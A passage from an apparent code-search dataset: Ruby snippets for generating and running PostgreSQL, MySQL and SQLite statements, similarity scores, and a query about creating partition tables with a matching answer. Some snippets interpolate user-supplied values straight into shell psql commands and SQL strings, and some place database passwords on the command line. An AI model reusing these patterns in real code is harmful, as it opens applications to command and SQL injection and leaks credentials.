"def create_function_sql(name, definition, opts=OPTS)\n args = opts[:args]\n if !opts[:args].is_a?(Array) || !opts[:args].any?{|a| Array(a).length == 3 and %w'OUT INOUT'.include?(a[2].to_s)}\n returns = opts[:returns] || 'void'\n end\n language = opts[:language] || 'SQL'\n <<-END\n CREATE#{' OR REPLACE' if opts[:replace]} FUNCTION #{name}#{sql_function_args(args)}\n #{\"RETURNS #{returns}\" if returns}\n LANGUAGE #{language}\n #{opts[:behavior].to_s.upcase if opts[:behavior]}\n #{'STRICT' if opts[:strict]}\n #{'SECURITY DEFINER' if opts[:security_definer]}\n #{\"PARALLEL #{opts[:parallel].to_s.upcase}\" if opts[:parallel]}\n #{\"COST #{opts[:cost]}\" if opts[:cost]}\n #{\"ROWS #{opts[:rows]}\" if opts[:rows]}\n #{opts[:set].map{|k,v| \" SET #{k} = #{v}\"}.join(\"\\n\") if opts[:set]}\n AS #{literal(definition.to_s)}#{\", #{literal(opts[:link_symbol].to_s)}\" if opts[:link_symbol]}\n END\n end",
"def sql\n <<-SQL\n -- Search learning paths\n SELECT DISTINCT\n c.id,\n c.name,\n c.course_code,\n c.settings,\n cc.content,\n 'learning_path' AS content_type,\n c.id AS learning_path_id,\n 0 AS learning_objective_id\n FROM courses c\n LEFT OUTER JOIN fearless_taggings ts\n ON ts.taggable_id = c.id AND ts.taggable_type = 'LearningPath'\n LEFT OUTER JOIN fearless_tags t\n ON t.id = ts.tag_id\n LEFT OUTER JOIN fearless_custom_contents cc\n ON cc.contentable_id = c.id AND cc.contentable_type = 'LearningPath'\n WHERE 0=0\n #{construct_account_clause}\n #{construct_course_worklow_clause}\n #{construct_name_sql}\n #{construct_all_tags_search('t', 'name')}\n UNION ALL\n -- Search learning objectives\n SELECT DISTINCT\n cm.id,\n cm.name,\n c.course_code,\n c.settings,\n cc.content,\n 'learning_objective' AS content_type,\n cm.context_id::bigint AS learning_path_id,\n cm.id::bigint AS learning_objective_id\n FROM context_modules cm\n INNER JOIN courses c\n ON c.id = cm.context_id\n AND cm.context_type = 'Course'\n LEFT OUTER JOIN fearless_taggings ts\n ON ts.taggable_id = cm.id AND ts.taggable_type = 'LearningObjective'\n LEFT OUTER JOIN fearless_tags t\n ON t.id = ts.tag_id\n LEFT OUTER JOIN fearless_custom_contents cc\n ON cc.contentable_id = cm.id AND cc.contentable_type = 'LearningObjective'\n WHERE 0=0\n #{construct_account_clause}\n #{construct_generic_workflow_clause('cm')}\n #{construct_name_sql('cm')}\n #{construct_all_tags_search('t', 'name')}\n UNION ALL\n -- Search learning learning_event\n SELECT DISTINCT\n ct.id,\n ct.title AS name,\n c.course_code,\n c.settings,\n cc.content,\n 'learning_event' AS content_type,\n ct.context_id::bigint AS learning_path_id,\n ct.context_module_id::bigint AS learning_objective_id\n FROM content_tags ct\n INNER JOIN courses c\n ON c.id = ct.context_id\n AND ct.context_type = 'Course'\n LEFT OUTER JOIN fearless_taggings ts\n ON ts.taggable_id = ct.id AND ts.taggable_type = 'LearningEvent'\n LEFT OUTER JOIN fearless_tags t\n ON t.id = ts.tag_id\n LEFT OUTER JOIN fearless_custom_contents cc\n ON cc.contentable_id = ct.id AND cc.contentable_type = 'LearningEvent'\n WHERE 0=0\n #{construct_account_clause}\n #{construct_generic_workflow_clause('ct')}\n #{construct_name_sql('ct', 'title')}\n #{construct_all_tags_search('t', 'name')}\n SQL\n end",
"def build_cmd(sql)\n # Only exists within the context of this script (not exported), so this\n # does not degrade security posture after the script has completed\n ENV['PGPASSWORD'] = conn_opts[:password] if conn_opts.has_key? :password\n\n cmd = \"psql\"\n cmd << \" -d #{conn_opts[:database]}\" if conn_opts.has_key? :database\n cmd << \" -h #{conn_opts[:host]}\" if conn_opts.has_key? :host\n cmd << \" -U #{conn_opts[:username]}\" if conn_opts.has_key? :username\n cmd << \" -p #{conn_opts[:port]}\" if conn_opts.has_key? :port\n cmd << \" -c \\\"#{sql}\\\"\"\n\n return cmd\n end",
"def create_proc(name, columns=[], options={}, &block)\n if select_value(\"SELECT count(oid) FROM pg_language WHERE lanname = 'plpgsql' \",\"count\").to_i == 0\n execute(\"CREATE FUNCTION plpgsql_call_handler() RETURNS language_handler AS '$libdir/plpgsql', 'plpgsql_call_handler' LANGUAGE c\")\n execute(\"CREATE TRUSTED PROCEDURAL LANGUAGE plpgsql HANDLER plpgsql_call_handler\")\n end\n\n if options[:force]\n drop_proc(name, columns) rescue nil\n end\n\n if block_given?\n execute get_proc_query(name, columns, options) { yield }\n elsif options[:resource]\n execute get_proc_query(name, columns, options)\n else\n raise StatementInvalid.new(\"Missing function source\")\n end\n end",
"def create_type_of_book(db)\r\n create_type_of_book_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS type_of_book(\r\n type_id INTEGER PRIMARY KEY,\r\n type_name VARCHAR(255)\r\n )\r\n SQL\r\n #create type_of_book table\r\n db.execute(create_type_of_book_cmd)\r\nend",
"def display_query_sql(users)\n tag.p('SQL:') + tag.code(users.to_sql)\n end",
"def sql_literal(*)\n @dataset.sql\n end",
"def boring_parrot(statement)\n statement\nend",
"def oracle; end",
"def create_book_condition(db)\r\n create_book_condition_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_condition(\r\n condition_id INTEGER PRIMARY KEY,\r\n condition_desc text(20)\r\n )\r\n SQL\r\n #create book_condition table\r\n db.execute(create_book_condition_cmd)\r\nend",
"def sql(string)\n ::Arel::Nodes::SqlLiteral.new(string)\n end",
"def build_sql(structure)\n structure = structure.is_a?(Constructor) ? structure.structure : structure\n sql = ''\n [:with, :union, :select, :insert, :update, :delete, :set, :from,\n :join, :where, :returning, :group, :order, :limit, :offset].each do |i|\n next unless structure[i]\n sql += send(\"build_#{i}\", structure[i], structure)\n end\n sql\n end",
"def generate(options)\n title = options[:title]\n # leader_names = options[:leader_names]\n column_names = options[:column_names]\n # headings = options[:headings]\n # follower_names = options[:follower_names]\n # headings = options[:headings]\n filename = options[:sql][:filename]\n # header = options[:sql][:header]\n\n @transforms = options[:transforms]\n @converter = options[:converter]\n\n\n max_size = -1\n column_names.each { |cn| max_size = cn.size if cn.size > max_size }\n\n sql_file = File.open(filename.to_s, 'w')\n\n sql_file.puts <<~EOS\n -- ==============================================================\n -- == File: #{filename}\n\n DROP TABLE IF EXISTS #{title.variablize('snake_case')};\n\n CREATE TABLE \"public\".\"#{title.variablize('snake_case')}\" (\n EOS\n\n if add_column? :id\n sql_file.puts %Q[ \"id\" INTEGER DEFAULT nextval('#{title.variablize('snake_case')}_id_seq'::regclass) NOT NULL UNIQUE,]\n end\n\n if add_column? :unique_id\n sql_file.puts %Q[ \"unique_id\" CHARACTER VARYING( 255 ) COLLATE \"pg_catalog\".\"default\",]\n end\n\n sql_file.puts '--'\n column_names.each do |col_name|\n spaces = \" \" * (max_size - col_name.size + 2)\n sql_file.print %Q' \"#{col_name}\" ' + spaces + get_type(col_name)\n # SMELL: must we always mod the source when new additional columns are added after spreadsheet?\n # TODO: need to have some kind of before and after feature for the added columns.\n if !(col_name == column_names.last) ||\n add_column?(:report_date) ||\n add_column?(:created_at) ||\n add_column?(:updated_at)\n sql_file.puts ','\n else\n sql_file.puts\n end\n end\n sql_file.puts '--'\n\n # SNELL: the last column name does not get a comma; but don't know which is last\n\n if add_column? :report_date\n sql_file.print '\"report_date\" Date'\n if add_column?(:created_at) || add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :created_at\n sql_file.print '\"created_at\" Date'\n if add_column?(:updated_at)\n sql_file.puts \",\"\n else\n sql_file.puts\n end\n end\n\n\n if add_column? :updated_at\n sql_file.puts '\"updated_at\" Date'\n end\n\n if add_column? :id\n sql_file.puts ' PRIMARY KEY ( \"id\" )'\n end\n\n sql_file.print \");\\n\\n\"\n\n sql_file.close\n\n\nap @@add_columns if verbose? || debug?\n\n\n end",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def create_genre(db)\r\n create_genre_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS genre(\r\n genre_id INTEGER PRIMARY KEY,\r\n genre_name VARCHAR(255)\r\n )\r\n SQL\r\n #create table genre\r\n db.execute(create_genre_cmd)\r\nend",
"def generate(name, symbol, typeInfo)\n ptl = typeInfo.parameterLists[0]\n return <<EOF\n\n/**\n * Create expression for GLSL operator '#{symbol}'.\n *\n#{ptl.toClosureAnnotation}\n * @return {!embedsl.Expression} Created expression.\n */\nembedsl.lang.#{name} = (function() {\n var cached = #{typeInfo.toEsl};\n return function(#{ptl.toParameterList}) {\n var args = Array.prototype.slice.call(arguments);\n return new embedsl.Expression(\n embedsl.Kind.OPERATOR, cached, '#{name}', '#{symbol}', args);\n };\n})();\nEOF\nend",
"def schema_table_projets\n <<-MYSQL\nCREATE TABLE projets\n (\n # ID\n # --\n # IDentifiant du projet, pas forcément le même que l'ID\n # du programme auquel il est associé.\n id INTEGER AUTO_INCREMENT,\n\n # TITRE\n # ------\n # Titre du projet\n # Il n'est pas obligatoire et, surtout, il n'est pas encore\n # défini à la création du projet. Par défaut, on met \"sans titre\"\n titre VARCHAR(255) DEFAULT 'Sans titre',\n\n # AUTEUR_ID\n # ---------\n # ID de l'auteur du projet\n auteur_id INTEGER NOT NULL,\n\n # PROGRAM_ID\n # ----------\n # ID du programme auquel est associé le projet.\n # C'est une valeur non nulle car un projet ne peut pas\n # être dissocié d'un programme ÉCRIRE UN ROMAN/FILM EN UN AN\n program_id INTEGER NOT NULL,\n\n # RÉSUMÉ\n # ------\n # Le résumé (littéraire) du projet\n resume TEXT,\n\n # SPECS\n # -----\n # Spécificités du projet, comme le fait que ce soit un\n # roman, etc.\n # Chaque bit représente une spécificité. Cf. le fichier\n # ./objet/unan/lib/required/projet/specs.rb pour le détail.\n specs VARCHAR(32),\n\n # CREATED_AT\n # ----------\n # Timestamp de la création du projet\n created_at INTEGER(10),\n\n # UPDATED_AT\n # ----------\n # Timestamp de la modification de cette donnée\n updated_at INTEGER(10),\n\n\n PRIMARY KEY (id)\n );\n MYSQL\nend",
"def open_procedure_literal\r\n suspend_execute_mode(\"vm.push(lambda {|vm, val=nil, idx=nil| \", :procedure)\r\n\r\n #Support for the standard procedure parameters.\r\n context.create_local_method('v', MacroSpec, [:macro, \"vm.push(val); \"])\r\n context.create_local_method('x', MacroSpec, [:macro, \"vm.push(idx); \"])\r\n\r\n #Support for local data.\r\n context.create_local_method('var:', LocalSpec, [:immediate], &Local_Var_Action)\r\n context.create_local_method('val:', LocalSpec, [:immediate], &Local_Val_Action)\r\n\r\n context.create_local_method('}}', MacroSpec, [:macro, :end, \"}); \"])\r\n end",
"def coding_with_language(#{name}, #{language})\n puts \"Hi, my name is #{name} and I am learning to program in #{language}!\"\nend",
"def psql_db_command__cli psql_db\n psql_db_command__program \"psql\", psql_db\n end",
"def generate\n tree = generate_syntax_tree\n source = []\n\n tree.butfirst.each do |production|\n non_terminal = production.first\n\n if non_terminal == :statement\n terminals = production.butfirst\n procedure = terminals.first\n arguments = terminals.butfirst\n\n # If we encounter an unknown procedure, we have to consider\n # it a fatal error.\n if mnemonic_exists?(procedure)\n source << eval_procedure(procedure, arguments)\n else\n raise Bolverk::ASM::SemanticError, \"Unknown procedure: '#{procedure.value}' at line #{procedure.line}.\"\n end\n end\n end\n\n source.join(\"\\n\")\n end",
"def create_psql_cmd(query, db)\n \"su postgres -c \\\"psql -d #{db} -p #{@port} -q -t -c #{escaped_query(query)}\\\"\"\n end",
"def create(language, body)\n Statements::CreateFunction\n .new(context: self, language: language, body: body)\n end",
"def function_sql(f)\n args = f.args\n \"#{f.f}#{args.empty? ? '()' : literal(args)}\"\n end",
"def getSqlSm (ask,type,number,questionChild)\r\n name=\"#{type}_#{number}\"\r\n listOptions = getListOptions(questionChild,\"option\")\r\n erbTemplate = getTemplate(\"../encuestas/templates/sql_sm.template\",binding)\r\n return erbTemplate.to_s\r\n end",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def to_sql\n\n # Hide Amex numbers\n# if (!@titolo_name.nil?) \n# if (@categoria_name == \"AMERICAN EXPRESS\" || @categoria_name == \"BANK OF AMERICA\") \n# @titolo_name.gsub!(/\\*.*\\*/, \"\");\n# end\n# end\n\n \n\n return \"INSERT INTO expenses (`created`, `anno`, `missione_title`, `missione_id`, `categoria_title`, `categoria_code`, `titolo_name`, `amministrazione_id`, `amministrazione_title`, `programma_id`, `programma_title`, `pagamenti_residui`,`pagamenti_totali`) VALUES (NOW(), '#{@anno}','#{@missione_title.to_s.gsub(/\\\\/,'\\&\\&').gsub(/'/,\"''\")}', '#{@missione_id}', '#{@categoria_title.to_s.gsub(/'/, \"''\")}', '#{@categoria_code}', '#{@titolo_name.to_s.gsub(/\\\\/, '\\&\\&').gsub(/'/, \"''\")}', '#{@amministrazione_id}', '#{@amministrazione_title.to_s.gsub(/\\\\/, '\\&\\&').gsub(/'/, \"''\")}', '#{@programma_id}', '#{@programma_title.to_s.gsub(/\\\\/, '\\&\\&').gsub(/'/, \"''\")}', #{@pagamenti_residui.gsub(/,/, \"\")}), #{@pagamenti_totali.gsub(/,/, \"\")});\"\n end",
"def sql_modes; end",
"def get_sql(structure, options)\n # get_partial_sql structure, key: 'sql'\n wrap_result send(\"build_#{options[:key] || 'sql'}\", structure)\n end",
"def create_table(table_name)\n # translate into pinyin, then to symbol\n table = trans_pinyin(table_name).to_sym\n DB.create_table table do\n primary_key :id\n String :mid, :unique=>true\n DateTime :created_timestamp\n String :content, :text => true\n String :source\n String :user_id\n String :user_name\n String :user_gender\n Integer :user_status_count\n Integer :user_fansNum\n end\n return table\nend",
"def to_script\n s = TRANSACTION_START[db_type].dup\n s << \"\\n\"\n rows.each {|r| s << r.insert_sql(db_type) }\n s << \"#{TRANSACTION_END[db_type]}\\n\"\n s\n end",
"def psql_db_command__program psql_program, psql_db\n shell_params_psql_db = quoted_shell_params psql_db\n db_name,\n db_user,\n db_password,\n db_host,\n reserved = shell_params_psql_db\n\n psql_command = \"PGPASSWORD=#{db_password} #{psql_program} -h #{db_host} -U #{db_user} #{db_name} \"\n end",
"def generate_sql\n @sql_path = \"#{File.dirname(@file_path)}/#{@base_name}.geoloader.sql\"\n system \"shp2pgsql #{@file_path} > #{@sql_path}\"\n end",
"def target_sql_mode=(_arg0); end",
"def execute sql\n db[sql]\n end",
"def psql(args)\n \"psql -X -q #{args}\"\nend",
"def compile_statement\n # write_tag '<statement>'\n return compile_let_statement if check?(TokenType::LET)\n return compile_while_statement if check?(TokenType::WHILE)\n return compile_do_statement if check?(TokenType::DO)\n return compile_return_statement if check?(TokenType::RETURN)\n return compile_if_statement if check?(TokenType::IF)\n # write_tag '</statement>'\n end",
"def physics_no_chemistry\n # In which years was the Physics prize awarded, but no Chemistry prize?\n execute(<<-SQL)\n SQL\nend",
"def statement \n\n\t$cst.add_branch(\"Statement\")\n\n\tcase scout_token\n\twhen \"T_PRINT\"\n\t\tprint_stmt\n\twhen \"T_ID\"\n\t\tassignment_stmt\n\twhen \"T_TYPE\"\n\t\tvardecl\n\twhen \"T_WHILE\"\n\t\twhile_stmt\n\twhen \"T_IF\"\n\t\tif_stmt\n\twhen \"T_LBRACE\"\n\t\tblock\n\telse\n\t\traise FaultyTokenError.new(\"T_PRINT, T_ID, T_TYPE, T_WHILE, T_IF, or T_LBRACE\", $tokens[$index])\n\tend\n\t\n\t$cst.ascend\n\t\nend",
"def initialize(fname=\"\", lname=\"\", email=\"\")\n @fname = fname\n @lname = lname\n @email = email\n\n puts `psql -d wdi-november -c \"INSERT INTO users (fname, lname, email) VALUES ('#{fname}','#{lname}', '#{email}')\"`\nend",
"def as_sql(expression, aliaz)\n \"#{expression} #{quote_identifier(aliaz)}\"\n end",
"def statement_text\n text_as_statement || text\n end",
"def create_interpreter \n template 'interpreter', \"lib/batch_load/import/#{table_name}/#{batch_loader_name}_interpreter.rb\"\n end",
"def create_main_course(db, name, main_course_descr)\n db.execute(\"INSERT INTO main_course (name, main_course_descr) VALUES (?, ?)\", [name, main_course_descr])\nend",
"def execute(sql, name = nil)\n # check for some DDL and DML statements\n puts \"Running sql? #{RUN_SQL}\"\n\n if /(create |alter |drop |insert |delete |update )/i.match sql.squish\n File.open(SQL_FILENAME, 'a') { |f| f.puts \"#{sql};\\n\" }\n puts \"Rails.env: #{Rails.env} - #{ENV['FPHS_POSTGRESQL_SCHEMA']}\"\n old_execute sql, name if RUN_SQL\n else\n # pass everything else to the aliased execute\n puts \"------------- (#{name}) ---------------\"\n puts sql || ''\n puts \"------------- ---------------\"\n old_execute sql, name if RUN_SQL\n end\n end",
"def create_table (table_name)\r\n\t\"CREATE TABLE IF NOT EXISTS \" + table_name + \r\n\t\"(\r\n\tid INTEGER PRIMARY KEY,\r\n\ttitle VARCHAR(255),\r\n\tcode VARCHAR(255)\r\n\t)\"\r\nend",
"def run_sql(sql)\n\tconn = PG.connect(dbname: \"video_store\", host: 'localhost')\n\tresult = conn.exec(sql)\n\tconn.close\n\tresult \nend",
"def run_sql(sql)\n connection = PG.connect(dbname: \"facebook_lab\", host: \"localhost\")\n result = connection.exec(sql)\n connection.close\n result\nend",
"def create_queries\n gen_rulename\n [\"\n -- FN for sync updates \n CREATE FUNCTION fn_#{suffix}()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n UPDATE #{dest_table}\n SET #{ cols.map{|src, dest| \"\\\"#{dest}\\\" = NEW.\\\"#{src}\\\"\" }.join(', ') }\n WHERE \\\"#{map_dest}\\\" = NEW.\\\"#{map_src}\\\";\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for sync updates\n CREATE TRIGGER tr_#{suffix}\n AFTER INSERT OR UPDATE ON #{src_table} \n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}();\",\n \"\n -- FN for cleaner\n CREATE FUNCTION fn_#{suffix}_cleaner()\n RETURNS TRIGGER\n LANGUAGE plpgsql\n AS $function$\n BEGIN\n IF OLD.sid = #{sid_src} OR OLD.sid = #{sid_dest} THEN\n #{delete_queries.join(' ')}\n END IF;\n RETURN NULL;\n END;\n $function$;\",\n \"\n -- TR for cleaner\n CREATE TRIGGER tr_#{suffix}_cleaner\n AFTER DELETE ON #{surveys_table}\n FOR EACH ROW EXECUTE PROCEDURE fn_#{suffix}_cleaner();\n \"]\n end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def sql\n Slacker.sql(self)\n end",
"def commence\n @vm, = API.compile( @db.handle, @sql )\n\n @current_row = API.step( @vm )\n\n @columns = @current_row[ :columns ]\n @types = @current_row[ :types ]\n\n check_eof( @current_row )\n end",
"def execute(sql, name = nil) \n # Only skip select statements from logging \n unless /^(select|show|begin|commit)/i.match(sql.strip) \n\t\tFile.open( File.join(RAILS_ROOT, 'db', 'ddl.sql'),'a') {|f|\n\t\t\ttemp_sql = sql.gsub(\"\\n\",\"\") \n\t\t\ttemp_sql = temp_sql + ';' if adapter_name != 'IBM_DB2' or adapter_name != 'IBM_DB'\n\t\t\tf.puts temp_sql\n\t\t}\n end\n\t old_execute sql, name\n end",
"def psql\n uri = generate_ingress_uri(\"Connecting\")\n ENV[\"PGPASSWORD\"] = uri.password\n ENV[\"PGSSLMODE\"] = 'require'\n system \"psql -U #{uri.user} -h #{uri.host} -p #{uri.port || 5432} #{uri.path[1..-1]}\"\n end",
"def generate2sql(w)\n File.open(@filename_target, 'w') {|file| file.write(w)}\nend",
"def target_sql_mode; end",
"def get_ddl(cfg)\n <<-EOS\n CREATE TABLE operations (\n id INTEGER AUTO_INCREMENT NOT NULL,\n address VARCHAR(100) NOT NULL,\n txid VARCHAR(100) NOT NULL,\n amount DECIMAL(16,8) NOT NULL,\n block_height INTEGER NOT NULL,\n block_hash VARCHAR(100) DEFAULT NULL,\n PRIMARY KEY (`id`),\n KEY `idx_address` (`address`),\n KEY `idx_txid` (`txid`),\n UNIQUE KEY `idx_address_txid` (`address`, `txid`)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n CREATE TABLE addresses (\n id INTEGER AUTO_INCREMENT NOT NULL,\n address VARCHAR(255) DEFAULT NULL,\n total_received DECIMAL(16,8) DEFAULT NULL,\n balance DECIMAL(16,9) DEFAULT NULL,\n n_tx INTEGER NOT NULL,\n PRIMARY KEY (`id`),\n KEY `idx_address` (`address`)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n EOS\n end",
"def to_sql\n @sql ||= case @kind\n when :target, :comp_op, :bin_bool_op, :term\n child(0).to_sql\n when :target_set\n # array of fragments, one per target\n [child(0).to_sql] + (child(1) ? child(2).to_sql : [])\n when :qual_term\n # child(2) will be an array (target_set)\n \"(\" + child(2).to_sql.collect{|sql| comparison(child(0), child(1).child(0), sql)}.join(\" OR \") + \")\"\n when :unqual_term\n \"(\" + default_quals.collect{|q| comparison(q, EQUAL_TOKEN, child(0).to_sql)}.join(\" OR \") + \")\"\n when :query\n # first form\n if child(0).is?(:lparen)\n @children.collect{|c| c.to_sql}.join\n # second form\n elsif child(1) && child(1).is?(:bin_bool_op)\n @children.collect{|c| c.to_sql}.join(\" \")\n # third form\n elsif child(1) && child(1).is?(:query)\n child(0).to_sql + \" AND \" + child(1).to_sql\n # fourth form\n else\n child(0).to_sql\n end\n end\n end",
"def introduction_with_language(name,language)\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\"\nend",
"def string\n @sql_string = \"SELECT #{@select} FROM #{@from}#{@join} WHERE #{@where};\"\n end",
"def sql_statement_all\n @sql_statement_all ||=\n <<-SQL\n SELECT\n applications.id AS id,\n teams.name AS team_name,\n projects.name AS project_name,\n (application_data -> :project_id)::int AS project_id,\n application_data -> :signed_off_at AS signed_off_at,\n (application_data -> :signed_off_by)::int AS signed_off_by,\n application_data -> :mentor_fav AS mentor_fav,\n CASE WHEN :project_id::text = 'project1_id' THEN 1 ELSE 2 END AS choice\n FROM applications\n INNER JOIN teams\n ON teams.id = applications.team_id\n INNER JOIN projects\n ON projects.id::text = applications.application_data -> :project_id\n WHERE (application_data -> :project_id)::int IN (:project_ids)\n AND applications.season_id = :season_id;\n SQL\n end",
"def run_sql(sql)\n\tdb = PG.connect(dbname: 'address_book', host: 'localhost')\n\tresult = db.exec(sql)\n\tdb.close\n\tresult\nend",
"def run_sql(sql)\n conn = PG.connect(dbname: 'goodfoodhunting')\n result = conn.exec(sql)\n conn.close\n return result\nend",
"def create_database\n $conn.exec(\"\"\"\n CREATE TABLE users (\n id SERIAL NOT NULL,\n name varchar(255) NOT NULL,\n created_at timestamp NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE UNIQUE INDEX user_names ON users (name);\n CREATE TABLE blathers (\n id SERIAL NOT NULL,\n text varchar(141) NOT NULL,\n created_at timestamp NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE TABLE blathers_mentioned_users (\n blather_id integer NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (blather_id, user_id)\n );\n \"\"\")\nend",
"def get_procedures\n connect_db.fetch(\"SELECT RDB$PROCEDURE_NAME, RDB$PROCEDURE_SOURCE FROM RDB$PROCEDURES\")\n end",
"def pa\n return VasmGrammar.new, VasmTransform.new\nend",
"def create_function(function_name, returning, definition, options = {})\n\n function_name = full_function_name(function_name, options)\n language = options[:language] || 'plpgsql'\n replace = if options[:replace] == false\n ''\n else\n 'OR REPLACE '\n end\n volatility = case options[:volatility]\n when :volatile, :stable, :immutable\n \"\\n #{options[:volatility].to_s.upcase}\"\n else\n \"\"\n end\n\n sql = <<-SQL.gsub(/^[ ]{6}/, \"\")\n CREATE #{replace}FUNCTION #{function_name}\n RETURNS #{returning}\n LANGUAGE #{language}#{volatility}\n AS $function$\n #{definition.strip}\n $function$\n SQL\n\n execute(sql)\n end",
"def introduction_with_language(name, language)\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\"\nend",
"def base_script\n base_language.standard_script\n end",
"def run_sql(sql)\n db = PG.connect(:dbname => 'movies', :host => 'localhost')\n result = db.exec(sql)\n db.close\n result\n end",
"def to_maql_create\n maql = \"# Create the '#{self.title}' data set\\n\"\n maql += \"CREATE DATASET {#{self.identifier}} VISUAL (TITLE \\\"#{self.title}\\\");\\n\\n\"\n [ attributes, facts, { 1 => @connection_point } ].each do |objects|\n objects.values.each do |obj|\n maql += \"# Create '#{obj.title}' and add it to the '#{self.title}' data set.\\n\"\n maql += obj.to_maql_create\n maql += \"ALTER DATASET {#{self.identifier}} ADD {#{obj.identifier}};\\n\\n\"\n end\n end\n\n labels.each do |label|\n maql += \"# Creating Labels\\n\"\n maql += label.to_maql_create\n end\n\n references.values.each do |ref|\n maql += \"# Creating references\\n\"\n maql += ref.to_maql_create\n end\n\n folders_maql = \"# Create folders\\n\"\n (folders[:attributes].values + folders[:facts].values).each { |folder| folders_maql += folder.to_maql_create }\n folders_maql + \"\\n\" + maql + \"SYNCHRONIZE {#{identifier}};\\n\"\n end",
"def define_python_methods\r\n @p.Execute(\"\r\ndef foo(x):\r\n return x + x\r\n\r\ndef bar(x):\r\n return x * x\r\n\"\r\n )\r\nend",
"def student_favourite_programming_language(language)\n return \"I love #{language}\"\n end",
"def compile_to_ruby\n statements.collect { |s| s.compile_to_ruby }.join(\"\\n\")\n end",
"def gtprogram\n stmts\nend",
"def generate_sql_query(stored_procedure_call, *attributes)\n sql_query = 'select * from '\n sql_query << stored_procedure_call << '('\n\n sql_query << attributes.map { |attribute|\n if attribute.kind_of?(Fixnum) || attribute.kind_of?(Float) || attribute.kind_of?(TrueClass) || \n attribute.kind_of?(FalseClass)\n attribute\n elsif attribute.nil?\n \"null\"\n else\n \"'\" + escape_quotes(attribute) + \"'\"\n end\n }.join(', ')\n\n sql_query << ');'\n end",
"def run_sql(sql)\n conn = PG.connect(dbname: \"memetube\", host: \"localhost\")\n begin\n result = conn.exec(sql)\n ensure\n conn.close\n end\n result\nend",
"def introduction_with_language(name, language)\n puts \"Hi, my name is #{name} and I am learning to program in #{language}.\"\nend",
"def run_sql(sql)\n db = PG.connect(dbname: 'goodfoodhunting')\n results = db.exec(sql)\n db.close\n results\nend",
"def sql_string\n self\n end",
"def run_sql(sql)\n conn = PG.connect(dbname: 'movies')\n result = conn.exec(sql)\n conn.close\n result\nend"
] |
[
"0.61669266",
"0.6121147",
"0.6121147",
"0.59831965",
"0.59831965",
"0.58226854",
"0.57331324",
"0.5722036",
"0.5647145",
"0.56217813",
"0.5590047",
"0.55899316",
"0.55826867",
"0.557583",
"0.55719095",
"0.5558236",
"0.55524683",
"0.5549",
"0.55081385",
"0.54753685",
"0.5455137",
"0.5428022",
"0.5413245",
"0.5391539",
"0.5378268",
"0.5374878",
"0.53664076",
"0.533763",
"0.5328607",
"0.5327648",
"0.53021234",
"0.52994627",
"0.5294819",
"0.5290663",
"0.5284321",
"0.528259",
"0.5243016",
"0.52396697",
"0.5232828",
"0.5229618",
"0.5225559",
"0.5225299",
"0.52191126",
"0.52077204",
"0.52001804",
"0.51964325",
"0.51829576",
"0.51828223",
"0.51786935",
"0.5175131",
"0.5167527",
"0.5157243",
"0.5139798",
"0.5122884",
"0.5120436",
"0.510454",
"0.5084944",
"0.50809807",
"0.50765556",
"0.50758827",
"0.5059281",
"0.5051089",
"0.50400156",
"0.5036784",
"0.5032889",
"0.5026841",
"0.5024534",
"0.5012896",
"0.500801",
"0.50050366",
"0.5003458",
"0.5003102",
"0.50008935",
"0.49943995",
"0.4994132",
"0.4983446",
"0.49815813",
"0.49790588",
"0.49764186",
"0.4969598",
"0.49638078",
"0.49629033",
"0.49572885",
"0.49519917",
"0.49501824",
"0.49490774",
"0.49452156",
"0.49397933",
"0.49365124",
"0.49355924",
"0.49331513",
"0.4930586",
"0.4927874",
"0.49262992",
"0.4922545",
"0.49167097",
"0.4909797",
"0.49031073",
"0.4898908",
"0.48988277"
] |
0.71067977
|
0
|
Create a partition of another table, used when the create_table with the :partition_of option is given.
|
def create_partition_of_table_from_generator(name, generator, options)
execute_ddl(create_partition_of_table_sql(name, generator, options))
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_table(name, options=OPTS, &block)\n if options[:partition_of]\n create_partition_of_table_from_generator(name, CreatePartitionOfTableGenerator.new(&block), options)\n return\n end\n\n super\n end",
"def create_range_partition(table_name, options, &block)\n raise ArgumentError, 'partition_key must be defined' if options[:partition_key].nil?\n\n Tablature.database.create_range_partition(table_name, options, &block)\n end",
"def create_partition_of_table_sql(name, generator, options)\n sql = create_table_prefix_sql(name, options).dup\n\n sql << \" PARTITION OF #{quote_schema_table(options[:partition_of])}\"\n\n case generator.partition_type\n when :range\n from, to = generator.range\n sql << \" FOR VALUES FROM #{literal(from)} TO #{literal(to)}\"\n when :list\n sql << \" FOR VALUES IN #{literal(generator.list)}\"\n when :hash\n mod, remainder = generator.hash_values\n sql << \" FOR VALUES WITH (MODULUS #{literal(mod)}, REMAINDER #{literal(remainder)})\"\n else # when :default\n sql << \" DEFAULT\"\n end\n\n sql << create_table_suffix_sql(name, options)\n\n sql\n end",
